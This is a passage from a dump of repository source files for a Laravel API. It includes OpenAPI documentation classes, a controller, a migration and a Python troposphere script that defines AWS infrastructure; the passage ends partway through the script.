"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Paths\\Files;\n\nuse App\\Docs\\Operations\\Files\\DownloadFileOperation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass FilesDownloadPath extends PathItem\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\PathItem\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->route('/files/{file}/download')\n ->parameters(\n Parameter::path()\n ->name('file')\n ->description('The ID of the file')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n ->required(),\n Parameter::query()\n ->name('token')\n ->description('The single use token needed to download private files')\n ->schema(Schema::string()->format(Schema::FORMAT_UUID))\n )\n ->operations(\n DownloadFileOperation::create()\n );\n }\n}\n"
},
{
"alpha_fraction": 0.6871609687805176,
"alphanum_fraction": 0.6880651116371155,
"avg_line_length": 30.600000381469727,
"blob_id": "454b7a0fac723df1b8e8159d5cf06cbd469eacb6",
"content_id": "2f0268d73d507a840a7ab65542918424db1db120",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1106,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 35,
"path": "/app/Docs/Operations/Contributions/DestroyContributionOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Contributions;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\ContributionsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse App\\Models\\EndUser;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\n\nclass DestroyContributionOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific contribution')\n ->description(\n Utils::operationDescription([Admin::class, EndUser::class])\n )\n ->tags(ContributionsTag::create())\n ->responses(\n ResourceDeletedResponse::create(null, 'contribution')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.646792471408844,
"alphanum_fraction": 0.64754718542099,
"avg_line_length": 31.317073822021484,
"blob_id": "913f8bc85eb90e89529d5a0897148fced39e597c",
"content_id": "26eb84172621addb340ec66824532085627306cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1325,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 41,
"path": "/app/Docs/Operations/Tags/DestroyTagOperation.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Docs\\Operations\\Tags;\n\nuse App\\Docs\\Responses\\ResourceDeletedResponse;\nuse App\\Docs\\Tags\\TagsTag;\nuse App\\Docs\\Utils;\nuse App\\Models\\Admin;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\BaseObject;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Parameter;\nuse GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Schema;\n\nclass DestroyTagOperation extends Operation\n{\n /**\n * @param string|null $objectId\n * @throws \\GoldSpecDigital\\ObjectOrientedOAS\\Exceptions\\InvalidArgumentException\n * @return \\GoldSpecDigital\\ObjectOrientedOAS\\Objects\\Operation\n */\n public static function create(string $objectId = null): BaseObject\n {\n return parent::create($objectId)\n ->action(static::ACTION_DELETE)\n ->summary('Delete a specific tag')\n ->description(\n Utils::operationDescription([Admin::class])\n )\n ->tags(TagsTag::create())\n ->parameters(\n Parameter::query()->name('type')->required()->schema(\n Schema::string()->enum('soft_delete', 'force_delete')\n )\n )\n ->responses(\n ResourceDeletedResponse::create(null, 'tag')\n );\n }\n}\n"
},
{
"alpha_fraction": 0.551196813583374,
"alphanum_fraction": 0.5598404407501221,
"avg_line_length": 32.42222213745117,
"blob_id": "f2311b9cc0ffc0ef5e7dd7d4e5918cd426ad0225",
"content_id": "7b56331b1f6a23070171c5a859bc155e5445f075",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1504,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 45,
"path": "/app/Http/Resources/ContributionResource.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Resources;\n\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\n\n/**\n * @property \\App\\Models\\Contribution $resource\n */\nclass ContributionResource extends JsonResource\n{\n /**\n * Transform the resource into an array.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return array\n */\n public function toArray($request): array\n {\n $isAdmin = optional($request->user('api'))->isAdmin();\n $isAuthor = optional($request->user('api'))->isEndUser()\n && $this->resource->belongsToEndUser($request->user('api')->endUser);\n\n return [\n 'id' => $this->resource->id,\n 'end_user_id' => $this->when($isAdmin || $isAuthor, $this->resource->end_user_id),\n 'content' => $this->resource->content,\n 'excerpt' => $this->resource->getExcerpt(),\n 'status' => $this->resource->status,\n 'changes_requested' => $this->when(\n $isAdmin || $isAuthor,\n $this->resource->changes_requested\n ),\n 'status_last_updated_at' => $this->when(\n $isAdmin || $isAuthor,\n $this->resource->status_last_updated_at->toIso8601String()\n ),\n 'created_at' => $this->resource->created_at->toIso8601String(),\n 'updated_at' => $this->resource->updated_at->toIso8601String(),\n 'tags' => TagResource::collection($this->resource->tags),\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5152625441551208,
"alphanum_fraction": 0.5311355590820312,
"avg_line_length": 23.81818199157715,
"blob_id": "2f653356e2016e03f4771edef9a822ea5f04edd6",
"content_id": "92d9e185ca7c5fd87037f020baa2501a21773f61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 819,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 33,
"path": "/app/Http/Requests/Admin/UpdateAdminRequest.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Requests\\Admin;\n\nuse App\\Rules\\Password;\nuse App\\Rules\\UkPhoneNumber;\nuse Illuminate\\Foundation\\Http\\FormRequest;\nuse Illuminate\\Validation\\Rule;\n\nclass UpdateAdminRequest extends FormRequest\n{\n /**\n * Get the validation rules that apply to the request.\n *\n * @return array\n */\n public function rules(): array\n {\n return [\n 'name' => ['bail', 'string', 'max:255'],\n 'phone' => ['bail', 'string', 'max:255', new UkPhoneNumber()],\n 'email' => [\n 'bail',\n 'email',\n 'max:255',\n Rule::unique('users')->ignore($this->admin->user_id),\n ],\n 'password' => ['bail', 'string', 'max:255', new Password()],\n ];\n }\n}\n"
},
{
"alpha_fraction": 0.5641025900840759,
"alphanum_fraction": 0.5667550563812256,
"avg_line_length": 28.763158798217773,
"blob_id": "3cd2cb95580d62b453992ded4734d37b3829222b",
"content_id": "55c408587734350dda46292059c46cfdab9e0d29",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1131,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 38,
"path": "/database/migrations/2019_05_29_101747_create_audits_table.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nuse Illuminate\\Database\\Migrations\\Migration;\nuse Illuminate\\Database\\Schema\\Blueprint;\nuse Illuminate\\Support\\Facades\\Schema;\n\nclass CreateAuditsTable extends Migration\n{\n /**\n * Run the migrations.\n */\n public function up(): void\n {\n Schema::create('audits', function (Blueprint $table): void {\n $table->uuid('id')->primary();\n $table->uuid('user_id')->nullable();\n $table->foreign('user_id')->references('id')->on('users');\n $table->unsignedInteger('client_id')->nullable();\n $table->foreign('client_id')->references('id')->on('oauth_clients');\n $table->string('action');\n $table->foreign('action')->references('action')->on('audit_actions');\n $table->text('description');\n $table->string('ip_address', 45);\n $table->text('user_agent')->nullable();\n $table->timestamp('created_at')->useCurrent();\n });\n }\n\n /**\n * Reverse the migrations.\n */\n public function down(): void\n {\n Schema::dropIfExists('audits');\n }\n}\n"
},
{
"alpha_fraction": 0.6368810534477234,
"alphanum_fraction": 0.6374502182006836,
"avg_line_length": 29.824562072753906,
"blob_id": "f9c40c31fe5bfc1816776bdbe692d8d56004d71a",
"content_id": "2ce335e20bd631df3ba936222d988144a53a5ca3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3514,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 114,
"path": "/app/Http/Controllers/V1/TagController.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Http\\Controllers\\V1;\n\nuse App\\Events\\EndpointInvoked;\nuse App\\Http\\Controllers\\ApiController;\nuse App\\Http\\Requests\\Tag\\DestroyTagRequest;\nuse App\\Http\\Requests\\Tag\\StoreTagRequest;\nuse App\\Http\\Resources\\TagResource;\nuse App\\Http\\Responses\\ResourceDeletedResponse;\nuse App\\Models\\Tag;\nuse App\\Services\\TagService;\nuse App\\Support\\Pagination;\nuse Illuminate\\Http\\Request;\nuse Illuminate\\Http\\Resources\\Json\\JsonResource;\nuse Illuminate\\Http\\Resources\\Json\\ResourceCollection;\nuse Illuminate\\Support\\Facades\\DB;\nuse Spatie\\QueryBuilder\\QueryBuilder;\n\nclass TagController extends ApiController\n{\n /**\n * @var \\App\\Services\\TagService\n */\n protected $tagService;\n\n /**\n * TagController constructor.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Support\\Pagination $pagination\n * @param \\App\\Services\\TagService $tagService\n */\n public function __construct(Request $request, Pagination $pagination, TagService $tagService)\n {\n parent::__construct($request, $pagination);\n\n $this->middleware(['auth:api', 'verified'])->except('index', 'show');\n $this->authorizeResource(Tag::class);\n\n $this->tagService = $tagService;\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Resources\\Json\\ResourceCollection\n */\n public function index(Request $request): ResourceCollection\n {\n $baseQuery = Tag::query()\n ->withCount('publicContributions');\n\n $tags = QueryBuilder::for($baseQuery)\n ->allowedSorts([\n 'name',\n ])\n ->defaultSort('name')\n ->get();\n\n event(EndpointInvoked::onRead($request, 'Viewed all tags.'));\n\n return TagResource::collection($tags);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Tag\\StoreTagRequest $request\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function store(StoreTagRequest $request): JsonResource\n {\n $tag = $this->tagService->create([\n 'parent_tag_id' => $request->parent_tag_id,\n 'name' => $request->name,\n ]);\n\n event(EndpointInvoked::onCreate($request, \"Created tag [{$tag->id}].\"));\n\n return new TagResource($tag);\n }\n\n /**\n * @param \\Illuminate\\Http\\Request $request\n * @param \\App\\Models\\Tag $tag\n * @return \\Illuminate\\Http\\Resources\\Json\\JsonResource\n */\n public function show(Request $request, Tag $tag): JsonResource\n {\n event(EndpointInvoked::onRead($request, \"Viewed tag [{$tag->id}].\"));\n\n return new TagResource($tag);\n }\n\n /**\n * @param \\App\\Http\\Requests\\Tag\\DestroyTagRequest $request\n * @param \\App\\Models\\Tag $tag\n * @return \\App\\Http\\Responses\\ResourceDeletedResponse\n */\n public function destroy(DestroyTagRequest $request, Tag $tag): ResourceDeletedResponse\n {\n DB::transaction(function () use ($request, $tag): void {\n $request->type === DestroyTagRequest::TYPE_FORCE_DELETE\n ? $this->tagService->forceDelete($tag)\n : $this->tagService->softDelete($tag);\n });\n\n $request->type === DestroyTagRequest::TYPE_FORCE_DELETE\n ? event(EndpointInvoked::onDelete($request, \"Force deleted tag [{$tag->id}].\"))\n : event(EndpointInvoked::onDelete($request, \"Soft deleted tag [{$tag->id}].\"));\n\n return new ResourceDeletedResponse('tag');\n }\n}\n"
},
{
"alpha_fraction": 0.7129629850387573,
"alphanum_fraction": 0.7222222089767456,
"avg_line_length": 9.800000190734863,
"blob_id": "8b906ef66bd1f0f8438b05445b4c12c04072fd69",
"content_id": "bda5d4e855046e832fe78ac14233c9f8cc56b449",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 108,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 10,
"path": "/app/Models/Relationships/CountryRelationships.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models\\Relationships;\n\ntrait CountryRelationships\n{\n //\n}\n"
},
{
"alpha_fraction": 0.6020638942718506,
"alphanum_fraction": 0.6135741472244263,
"avg_line_length": 26.062297821044922,
"blob_id": "8596622010dc32e701f3dfee5a4b8f091637e5eb",
"content_id": "fd52376b4333c8b239c3070085fa34361cf7dcba",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 25195,
"license_type": "permissive",
"max_line_length": 245,
"num_lines": 931,
"path": "/aws/cloudformation.py",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "# ==================================================\n# This stack creates the API infrastructure.\n# ==================================================\nfrom troposphere import Template, Parameter, Ref, GetAtt, Join, Base64, Output, Sub\nimport troposphere.ec2 as ec2\nimport troposphere.rds as rds\nimport troposphere.elasticache as elasticache\nimport troposphere.sqs as sqs\nimport troposphere.s3 as s3\nimport troposphere.iam as iam\nimport troposphere.ecs as ecs\nimport troposphere.ecr as ecr\nimport troposphere.logs as logs\nimport troposphere.elasticloadbalancingv2 as elb\nimport troposphere.autoscaling as autoscaling\nimport uuid\n\n# ==================================================\n# Template details.\n# ==================================================\ntemplate = Template('Create the infrastructure needed to run the Connecting Voices API')\ntemplate.set_version('2010-09-09')\n\n# ==================================================\n# Parameters.\n# ==================================================\nuuid_parameter = template.add_parameter(\n Parameter(\n 'Uuid',\n Type='String',\n Default=str(uuid.uuid4()),\n Description='The unique ID for this stack.',\n MinLength='36',\n MaxLength='36'\n )\n)\n\nenvironment_parameter = template.add_parameter(\n Parameter(\n 'Environment',\n Type='String',\n Description='The environment this stack is for (e.g. production or staging).',\n MinLength='1'\n )\n)\n\ncertificate_arn_parameter = template.add_parameter(\n Parameter(\n 'CertificateArn',\n Type='String',\n Description='The ARN for the API load balancer SSL certificate.'\n )\n)\n\nvpc_parameter = template.add_parameter(\n Parameter(\n 'Vpc',\n Type='AWS::EC2::VPC::Id',\n Description='The Virtual Private Cloud (VPC) to launch the stack in.'\n )\n)\n\nsubnets_parameter = template.add_parameter(\n Parameter(\n 'Subnets',\n Type='List<AWS::EC2::Subnet::Id>',\n Description='The list of subnet IDs, for at least two Availability Zones in the region in your Virtual Private Cloud (VPC).'\n )\n)\n\ndatabase_password_parameter = template.add_parameter(\n Parameter(\n 'DatabasePassword',\n Description='The database admin password.',\n NoEcho=True,\n Type='String',\n MinLength='8',\n MaxLength='41',\n AllowedPattern='[a-zA-Z0-9]*',\n ConstraintDescription='Must only contain alphanumeric characters.'\n )\n)\n\ndatabase_class_parameter = template.add_parameter(\n Parameter(\n 'DatabaseClass',\n Description='The database instance class.',\n Type='String',\n Default='db.t3.micro',\n AllowedValues=[\n 'db.t3.micro',\n 'db.t3.small',\n 'db.t3.medium',\n 'db.t3.large',\n 'db.t3.xlarge',\n 'db.t3.2xlarge'\n ],\n ConstraintDescription='Must select a valid database instance type.'\n )\n)\n\ndatabase_allocated_storage_parameter = template.add_parameter(\n Parameter(\n 'DatabaseAllocatedStorage',\n Description='The size of the database (GiB).',\n Default='10',\n Type='Number',\n MinValue='5',\n MaxValue='1024',\n ConstraintDescription='Must be between 5 and 1024 GiB.'\n )\n)\n\nredis_node_class_parameter = template.add_parameter(\n Parameter(\n 'RedisNodeClass',\n Description='The Redis node class.',\n Type='String',\n Default='cache.t2.micro',\n AllowedValues=[\n 'cache.t2.micro',\n 'cache.t2.small',\n 'cache.t2.medium'\n ],\n ConstraintDescription='Must select a valid Redis node type.'\n )\n)\n\nredis_nodes_count_parameter = template.add_parameter(\n Parameter(\n 'RedisNodesCount',\n Description='The number of Redis nodes to have in the cluster.',\n Default='1',\n Type='Number',\n MinValue='1',\n 
ConstraintDescription='Must be 1 or more.'\n )\n)\n\napi_instance_class_parameter = template.add_parameter(\n Parameter(\n 'ApiInstanceClass',\n Description='The API EC2 instance class.',\n Type='String',\n Default='t3.micro',\n AllowedValues=[\n 't3.nano',\n 't3.micro',\n 't3.small',\n 't3.medium',\n 't3.large',\n 't3.xlarge',\n 't3.2xlarge'\n ],\n ConstraintDescription='Must select a valid API instance type.'\n )\n)\n\napi_instance_count_parameter = template.add_parameter(\n Parameter(\n 'ApiInstanceCount',\n Description='The number of API EC2 instances to load balance between.',\n Type='Number',\n Default='2',\n MinValue='1',\n ConstraintDescription='Must be 1 or more.'\n )\n)\n\napi_task_count_parameter = template.add_parameter(\n Parameter(\n 'ApiTaskCount',\n Description='The number of API containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n ConstraintDescription='Must be 0 or more.'\n )\n)\n\nscheduler_task_count_parameter = template.add_parameter(\n Parameter(\n 'SchedulerTaskCount',\n Description='The number of scheduler containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n MaxValue='1',\n ConstraintDescription='Must be either 0 or 1.'\n )\n)\n\nqueue_worker_task_count_parameter = template.add_parameter(\n Parameter(\n 'QueueWorkerTaskCount',\n Description='The number of queue worker containers to run.',\n Type='Number',\n Default='0',\n MinValue='0',\n ConstraintDescription='Must be 0 or more.'\n )\n)\n\n# ==================================================\n# Variables.\n# ==================================================\ndefault_queue_name_variable = Join('-', ['default', Ref(environment_parameter), Ref(uuid_parameter)])\nuploads_bucket_name_variable = Join('-', ['uploads', Ref(environment_parameter), Ref(uuid_parameter)])\napi_launch_template_name_variable = Join('-', ['api-launch-template', Ref(environment_parameter)])\ndocker_repository_name_variable = Join('-', ['api', Ref(environment_parameter), Ref(uuid_parameter)])\napi_log_group_name_variable = Join('-', ['api', Ref(environment_parameter)])\nqueue_worker_log_group_name_variable = Join('-', ['queue-worker', Ref(environment_parameter)])\nscheduler_log_group_name_variable = Join('-', ['scheduler', Ref(environment_parameter)])\napi_task_definition_family_variable = Join('-', ['api', Ref(environment_parameter)])\nqueue_worker_task_definition_family_variable = Join('-', ['queue-worker', Ref(environment_parameter)])\nscheduler_task_definition_family_variable = Join('-', ['scheduler', Ref(environment_parameter)])\napi_user_name_variable = Join('-', ['api', Ref(environment_parameter)])\nci_user_name_variable = Join('-', ['ci', Ref(environment_parameter)])\ndatabase_name_variable = 'connecting_voices'\ndatabase_username_variable = 'connecting_voices'\n\n# ==================================================\n# Resources.\n# ==================================================\nload_balancer_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'LoadBalancerSecurityGroup',\n GroupDescription='For connecting to the API load balancer',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='HTTP access from the public',\n IpProtocol='tcp',\n FromPort='80',\n ToPort='80',\n CidrIp='0.0.0.0/0'\n ),\n ec2.SecurityGroupRule(\n Description='HTTPS access from the public',\n IpProtocol='tcp',\n FromPort='443',\n ToPort='443',\n CidrIp='0.0.0.0/0'\n )\n ]\n )\n)\n\napi_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'ApiSecurityGroup',\n GroupDescription='For 
connecting to the API containers',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='Full access from the load balancer',\n IpProtocol='tcp',\n FromPort='0',\n ToPort='65535',\n SourceSecurityGroupName=Ref(load_balancer_security_group_resource)\n )\n ]\n )\n)\n\ndatabase_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'DatabaseSecurityGroup',\n GroupDescription='For connecting to the MySQL instance',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='MySQL access from the API containers',\n IpProtocol='tcp',\n FromPort='3306',\n ToPort='3306',\n SourceSecurityGroupName=Ref(api_security_group_resource)\n )\n ]\n )\n)\n\nredis_security_group_resource = template.add_resource(\n ec2.SecurityGroup(\n 'RedisSecurityGroup',\n GroupDescription='For connecting to the Redis cluster',\n SecurityGroupIngress=[\n ec2.SecurityGroupRule(\n Description='Redis access from the API containers',\n IpProtocol='tcp',\n FromPort='6379',\n ToPort='6379',\n SourceSecurityGroupName=Ref(api_security_group_resource)\n )\n ]\n )\n)\n\ndatabase_subnet_group_resource = template.add_resource(\n rds.DBSubnetGroup(\n 'DatabaseSubnetGroup',\n DBSubnetGroupDescription='Subnets available for the RDS instance',\n SubnetIds=Ref(subnets_parameter)\n )\n)\n\ndatabase_resource = template.add_resource(\n rds.DBInstance(\n 'Database',\n DBName=database_name_variable,\n AllocatedStorage=Ref(database_allocated_storage_parameter),\n DBInstanceClass=Ref(database_class_parameter),\n Engine='MySQL',\n EngineVersion='5.7',\n MasterUsername=database_username_variable,\n MasterUserPassword=Ref(database_password_parameter),\n VPCSecurityGroups=[GetAtt(database_security_group_resource, 'GroupId')],\n DBSubnetGroupName=Ref(database_subnet_group_resource),\n PubliclyAccessible=False\n )\n)\n\nredis_subnet_group_resource = template.add_resource(\n elasticache.SubnetGroup(\n 'RedisSubnetGroup',\n Description='Subnets available for the Redis cluster',\n SubnetIds=Ref(subnets_parameter)\n )\n)\n\nredis_resource = template.add_resource(\n elasticache.CacheCluster(\n 'Redis',\n Engine='redis',\n EngineVersion='4.0',\n CacheNodeType=Ref(redis_node_class_parameter),\n NumCacheNodes=Ref(redis_nodes_count_parameter),\n VpcSecurityGroupIds=[GetAtt(redis_security_group_resource, 'GroupId')],\n CacheSubnetGroupName=Ref(redis_subnet_group_resource)\n )\n)\n\ndefault_queue_resource = template.add_resource(\n sqs.Queue(\n 'DefaultQueue',\n QueueName=default_queue_name_variable\n )\n)\n\nuploads_bucket_resource = template.add_resource(\n s3.Bucket(\n 'UploadsBucket',\n BucketName=uploads_bucket_name_variable,\n AccessControl='Private'\n )\n)\n\necs_cluster_role_resource = template.add_resource(\n iam.Role(\n 'ECSClusterRole',\n ManagedPolicyArns=['arn:aws:iam::aws:policy/service-role/AmazonEC2ContainerServiceforEC2Role'],\n AssumeRolePolicyDocument={\n 'Version': '2012-10-17',\n 'Statement': [\n {\n 'Action': 'sts:AssumeRole',\n 'Principal': {\n 'Service': 'ec2.amazonaws.com'\n },\n 'Effect': 'Allow'\n }\n ]\n }\n )\n)\n\nec2_instance_profile_resource = template.add_resource(\n iam.InstanceProfile(\n 'EC2InstanceProfile',\n Roles=[Ref(ecs_cluster_role_resource)]\n )\n)\n\necs_cluster_resource = template.add_resource(\n ecs.Cluster(\n 'ApiCluster'\n )\n)\n\nlaunch_template_resource = template.add_resource(\n ec2.LaunchTemplate(\n 'LaunchTemplate',\n LaunchTemplateName=api_launch_template_name_variable,\n LaunchTemplateData=ec2.LaunchTemplateData(\n ImageId='ami-0ae254c8a2d3346a7',\n 
InstanceType=Ref(api_instance_class_parameter),\n IamInstanceProfile=ec2.IamInstanceProfile(\n Arn=GetAtt(ec2_instance_profile_resource, 'Arn')\n ),\n InstanceInitiatedShutdownBehavior='terminate',\n Monitoring=ec2.Monitoring(Enabled=True),\n SecurityGroups=[Ref(api_security_group_resource)],\n BlockDeviceMappings=[\n ec2.BlockDeviceMapping(\n DeviceName='/dev/xvdcz',\n Ebs=ec2.EBSBlockDevice(\n DeleteOnTermination=True,\n VolumeSize=22,\n VolumeType='gp2'\n )\n )\n ],\n UserData=Base64(\n Join('', [\n '#!/bin/bash\\n',\n 'echo ECS_CLUSTER=',\n Ref(ecs_cluster_resource),\n ' >> /etc/ecs/ecs.config;echo ECS_BACKEND_HOST= >> /etc/ecs/ecs.config;'\n ])\n )\n )\n )\n)\n\ndocker_repository_resource = template.add_resource(\n ecr.Repository(\n 'DockerRepository',\n RepositoryName=docker_repository_name_variable,\n LifecyclePolicy=ecr.LifecyclePolicy(\n LifecyclePolicyText='{\"rules\":[{\"rulePriority\":1,\"description\":\"Remove untagged images older than 1 week\",\"selection\":{\"tagStatus\":\"untagged\",\"countType\":\"sinceImagePushed\",\"countUnit\":\"days\",\"countNumber\":7},\"action\":{\"type\":\"expire\"}}]}'\n )\n )\n)\n\napi_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'ApiLogGroup',\n LogGroupName=api_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\nqueue_worker_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'QueueWorkerLogGroup',\n LogGroupName=queue_worker_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\nscheduler_log_group_resource = template.add_resource(\n logs.LogGroup(\n 'SchedulerLogGroup',\n LogGroupName=scheduler_log_group_name_variable,\n RetentionInDays=7\n )\n)\n\napi_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'ApiTaskDefinition',\n Family=api_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n Ref(docker_repository_resource)\n ])\n ]),\n MemoryReservation='256',\n PortMappings=[ecs.PortMapping(\n HostPort='0',\n ContainerPort='80',\n Protocol='tcp'\n )],\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(api_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n )\n )]\n )\n)\n\nqueue_worker_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'QueueWorkerTaskDefinition',\n Family=queue_worker_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n Ref(docker_repository_resource)\n ])\n ]),\n MemoryReservation='256',\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(queue_worker_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n ),\n Command=[\n 'php',\n 'artisan',\n 'queue:work',\n '--tries=1'\n ],\n WorkingDirectory='/var/www/html',\n HealthCheck=ecs.HealthCheck(\n Command=[\n 'CMD-SHELL',\n 'php -v || exit 1'\n ],\n Interval=30,\n Retries=3,\n Timeout=5\n )\n )]\n )\n)\n\nscheduler_task_definition_resource = template.add_resource(\n ecs.TaskDefinition(\n 'SchedulerTaskDefinition',\n 
Family=scheduler_task_definition_family_variable,\n NetworkMode='bridge',\n RequiresCompatibilities=['EC2'],\n ContainerDefinitions=[ecs.ContainerDefinition(\n Name='api',\n Image=Join('.', [\n Ref('AWS::AccountId'),\n 'dkr.ecr',\n Ref('AWS::Region'),\n Join('/', [\n 'amazonaws.com',\n docker_repository_name_variable\n ])\n ]),\n MemoryReservation='256',\n Essential=True,\n LogConfiguration=ecs.LogConfiguration(\n LogDriver='awslogs',\n Options={\n 'awslogs-group': Ref(scheduler_log_group_resource),\n 'awslogs-region': Ref('AWS::Region'),\n 'awslogs-stream-prefix': 'ecs'\n }\n ),\n Command=[\n 'php',\n 'artisan',\n 'cv:schedule:loop'\n ],\n WorkingDirectory='/var/www/html',\n HealthCheck=ecs.HealthCheck(\n Command=[\n 'CMD-SHELL',\n 'php -v || exit 1'\n ],\n Interval=30,\n Retries=3,\n Timeout=5\n )\n )]\n )\n)\n\nload_balancer_resource = template.add_resource(\n elb.LoadBalancer(\n 'LoadBalancer',\n Scheme='internet-facing',\n SecurityGroups=[GetAtt(load_balancer_security_group_resource, 'GroupId')],\n Subnets=Ref(subnets_parameter),\n )\n)\n\napi_target_group_resource = template.add_resource(\n elb.TargetGroup(\n 'ApiTargetGroup',\n HealthCheckIntervalSeconds=30,\n HealthCheckPath='/',\n HealthCheckPort='traffic-port',\n HealthCheckProtocol='HTTP',\n HealthCheckTimeoutSeconds=5,\n HealthyThresholdCount=5,\n UnhealthyThresholdCount=2,\n Port=80,\n Protocol='HTTP',\n TargetType='instance',\n VpcId=Ref(vpc_parameter),\n DependsOn=[load_balancer_resource]\n )\n)\n\nload_balancer_http_listener_resource = template.add_resource(\n elb.Listener(\n 'LoadBalancerHttpListener',\n LoadBalancerArn=Ref(load_balancer_resource),\n Port=80,\n Protocol='HTTP',\n DefaultActions=[\n elb.Action(\n Type='redirect',\n RedirectConfig=elb.RedirectConfig(\n Port='443',\n Protocol='HTTPS',\n StatusCode='HTTP_301'\n )\n )\n ]\n )\n)\n\nload_balancer_https_listener_resource = template.add_resource(\n 